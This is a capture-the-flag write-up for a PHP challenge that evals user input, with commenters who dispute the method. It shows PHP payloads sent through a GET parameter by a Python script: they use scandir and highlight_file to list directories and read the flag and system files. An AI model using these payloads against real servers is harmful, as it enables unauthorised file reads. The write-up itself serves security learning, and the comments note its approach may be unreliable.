Tags: web php

Rating: 2.0

This was a php challenge where the website would just eval the code you provided in the get request.
At first I thought about using something like system or exec, but those functions and others like shell_exec were disabled.
We can verify that by executing phpinfo(); and checking the functions listed in disabled_function class.
So running any clever system code or something like a shell was out of question.
Also look out for open_basedir in the php configuration you get from phpinfo();. Luckily for us it was set to / so we could explore the file system easily.

Using  __DIR__ , scandir, we can quickly check which subdirectory the website is running. There was only index.php in /var/www/html.
In the / directory, we will find flag.so and flag.h (along with .dockerenv folder, start.sh) , catting out flag.so (you can use highlight_file) will give the flag as it was hardcoded in the binary.

FLAG : flag{FFi_1s_qu1T3_DANg1ouS}

python
import requests
url = "http://pwnable.org:19260"
# payload = """echo $s = base64_encode(readfile("../../../flag.so"));""" # payload = """$f = scandir("/var/www/html");var_dump($f);""" # payload = """$f = highlight_file('/start.sh');var_dump($f);""" r = requests.Session() print(payload) print() s = r.get(url+"?rh="+payload) final = s.text print(final) r.close()  DaviciiJune 29, 2020, 1:45 p.m. The open_bsedir is showing /var/www/http and not /. I also can't access the var or www dir through scandir. How did you get it? Can you give some more details please iqnoJune 29, 2020, 3:49 p.m. Could you elaborate a bit more oh how you were able to read outside of the /var/www/http directory?$t = scandir("/"); var_dump(\$t); evaluates to bool(false) as the www-data user presumably doesn't have the permissions to read anywhere except /var/www/http.
And as the previous comment mentions, the open_basedir is set to /var/www/html ?

ScalpelJune 29, 2020, 5:28 p.m.

I think this might have been the unintended solution. I got the same solution, but only once. Was not reproducible, because all the other times I tried the / directory was empty. Only one time I was able to list contents of the files in /

There was a new challenge, noeasyphp, that was put up during the competition because of instability of easyphp.

IsopachJune 30, 2020, 8:42 a.m.

Your solution probably depended on someone else with a bypass trying to solve the challenge, which is why it doesn't work anymore.